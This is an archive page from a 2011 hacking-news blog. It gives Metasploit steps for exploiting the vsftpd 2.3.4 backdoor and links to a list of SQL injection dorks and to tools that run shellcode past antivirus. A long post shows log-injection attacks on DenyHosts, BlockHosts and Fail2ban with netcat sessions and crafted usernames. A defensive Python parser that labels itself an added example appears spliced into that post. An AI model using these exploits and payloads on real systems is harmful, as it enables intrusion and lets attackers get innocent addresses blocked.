Tuesday, 5. July 2011
Video Demonstration: Vsftpd backdoor
On Tuesday, 5 Jul 2011 in the topic 'Vulnerabilities'
Affected versions:
vsftpd-2.3.4 from 2011-06-30
https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5
Metasploit demo:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded
discovered by Mathias Kresin
Monday, 4. July 2011
5000 SQL Dorks
On Monday, 4 Jul 2011 in the topic 'Vulnerabilities'
inurl:declaration_more.php?decl_id=
inurl:Pageid="
.......................
.......................
Download:
http://www62.megaupload.com/files/4cef0fdb4a3a7b84ca88ebdce2e54dc5/Neu_Textdokument.txt
Sunday, 3. July 2011
Process Injection Outside of Metasploit
On Sunday, 3 Jul 2011 in the topic 'Vulnerabilities'
You may find yourself needing to do process injection outside of Metasploit/Meterpreter. Good examples are when you have a Java Meterpreter shell, when you only have access to a GUI environment (Citrix), and/or when AV is going nom nom nom on your Metasploit binary.
There are two public options: shellcodeexec and syringe.
Both let you generate shellcode with msfpayload (not currently working with msfvenom), inject it into memory (into a process, in the case of syringe) and get your Meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
Thursday, 30. June 2011
google plus vuln to XSS
On Thursday, 30 Jun 2011 in the topic 'Vulnerabilities'
pathric due found that the Google Plus application has a parameter that is vulnerable to XSS:
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
SQL Injection Vulnerability in Google Lab Database System
On Thursday, 30 Jun 2011 in the topic 'Vulnerabilities'
Hackers release step-by-step proof of this vulnerability
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
Vulnerable programs
On Thursday, 30 Jun 2011 in the topic 'Vulnerabilities'
We used DenyHosts in our previous example because it is one of the best-known tools out there, but it is not the only one that is vulnerable.
The latest version of BlockHosts (2.0.3) is also vulnerable to log injection via the vsftpd and SSH logs. The reason is the same as with DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client "2.3.4.54"
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client "2.3.4.54" ] FAIL LOGIN: Client "192.168.3.1"
If we pass a modified user name in order to inject an IP address, it will block the fake, attacker-supplied IP address instead of the real one.
root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#---- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake IP address instead of the real one (the exploit for DenyHosts works against BlockHosts with just a slight change, left as an exercise for the reader).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'sshd[123]: User myself from 1.5.6.7 not allowed ' from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#---- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
The latest version of Fail2ban (0.8) is vulnerable to the same injection via the SSH logs as DenyHosts and BlockHosts. It looks for "ROOT LOGIN REFUSED" anywhere in the logs and, as shown above, we can easily inject that string using sshd's bad protocol identification message.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
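All three blockers fail for the same reason: they search for a fragment such as `FAIL LOGIN: Client "..."` or `ROOT LOGIN REFUSED` anywhere in a line and take the first IP that follows it, so text the client placed in the username or in the SSH version string wins over the address the daemon wrote. The script below is an added example, not code from DenyHosts, BlockHosts or Fail2ban; its log lines are constructed after the ones quoted in this post, and its regular expressions are illustrative rather than the projects' own patterns. It contrasts the loose, unanchored match with a whole-line template that reads the client address only from the trailing field the daemon itself appends, and it flags lines whose user-controlled field contains log keywords so they can be reviewed instead of acted on.

```python
"""Loose vs. anchored parsing of sshd / vsftpd failure lines.

Added example (not the DenyHosts, BlockHosts or Fail2ban code). Sample
lines are constructed after the post's quoted logs; patterns are
illustrative and are not the projects' own expressions.
"""
import ipaddress
import re

# Constructed sample lines. In the *_INJECTED ones the client-controlled
# field (FTP username / SSH protocol identification) carries a fake
# log fragment; the daemon still appends the real peer address last.
VSFTPD_NORMAL = ('Mon Jun  2 21:07:15 2007 [pid 1460] [bob] '
                 'FAIL LOGIN: Client "192.168.3.1"')
VSFTPD_INJECTED = ('Mon Jun  2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: '
                   'Client "2.3.4.54" ] FAIL LOGIN: Client "192.168.3.1"')
SSHD_NORMAL = 'Jun  4 14:50:01 slacker sshd[4160]: ROOT LOGIN REFUSED FROM 10.1.1.14'
SSHD_INJECTED = ("Jun  4 14:49:46 slacker sshd[4153]: Bad protocol version "
                 "identification 'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' from 10.1.1.14")

IP = r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3})'

# Loose patterns: a fragment searched anywhere in the line, first hit wins.
LOOSE_VSFTPD = re.compile(r'FAIL LOGIN: Client "' + IP + '"')
LOOSE_SSHD = re.compile(r'ROOT LOGIN REFUSED.*FROM ' + IP)

# Anchored patterns: the whole syslog/vsftpd line template, with the IP
# taken only from the final field that the daemon writes after any
# client-supplied text. Client-controlled fields get their own group.
VSFTPD_PREFIX = r'^\w{3} \w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d \d{4} \[pid \d+\] '
SSHD_PREFIX = r'^\w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d \S+ sshd\[\d+\]: '
STRICT_RULES = [
    ('vsftpd_fail_login', re.compile(
        VSFTPD_PREFIX + r'\[(?P<tainted>.*)\] FAIL LOGIN: Client "' + IP + '"$')),
    ('sshd_root_refused', re.compile(
        SSHD_PREFIX + r'ROOT LOGIN REFUSED FROM ' + IP + '$')),
    ('sshd_bad_protocol', re.compile(
        SSHD_PREFIX + r"Bad protocol version identification '(?P<tainted>.*)' from " + IP + '$')),
]

# Substrings that have no business inside a username or version string.
LOG_KEYWORDS = ('FAIL LOGIN', 'REFUSED', 'sshd[', ']', '"')


def loose_offender(line):
    """The vulnerable approach: first fragment match, IP taken from it."""
    for pat in (LOOSE_VSFTPD, LOOSE_SSHD):
        m = pat.search(line)
        if m:
            return m.group('ip')
    return None


def strict_offender(line):
    """Anchored approach. Returns (rule_name, ip) or None.

    Only a line that matches a complete template counts, and the address
    is read from the trailing daemon-written field, so an injected
    fragment earlier in the line cannot supply it. A syntactically
    invalid address is rejected rather than written to hosts.deny.
    """
    for name, pat in STRICT_RULES:
        m = pat.match(line)
        if not m:
            continue
        try:
            ipaddress.IPv4Address(m.group('ip'))
        except ValueError:
            return None
        return name, m.group('ip')
    return None


def injection_suspected(line):
    """True if the client-controlled field of a matched line looks like a
    log fragment, i.e. someone is trying to spoof the parser."""
    for _name, pat in STRICT_RULES:
        m = pat.match(line)
        if m and 'tainted' in m.groupdict():
            field = m.group('tainted')
            return any(k in field for k in LOG_KEYWORDS)
    return False


if __name__ == '__main__':
    for line in (VSFTPD_NORMAL, VSFTPD_INJECTED, SSHD_NORMAL, SSHD_INJECTED):
        print(f'loose={loose_offender(line)!s:<12} strict={strict_offender(line)!s:<40} '
              f'suspicious={injection_suspected(line)}')
```

Running it shows the loose matcher returning 2.3.4.54 and 1.5.6.7 (the injected values) for the two crafted lines, while the anchored rules return 192.168.3.1 and 10.1.1.14 and mark both lines as suspicious. The design point is that attacker-influenced fields are positional, so a parser that knows the full line layout can quarantine them; a parser that greps for keywords cannot.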
Metasploit Framework 3.7.2 incl. Tut
On Thursday, 30 Jun 2011 in the topic 'Vulnerabilities'
The Metasploit team has spent the last two months focused on one of the least-visible, but most important pieces of the Metasploit Framework; the session backend. Metasploit 3.7 represents a complete overhaul of how sessions are tracked within the framework and associated with the backend database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history -- even if you don't have a database.
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
Top 25 Most Dangerous Software Errors
On Thursday, 30 Jun 2011 in the topic 'Vulnerabilities'
The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf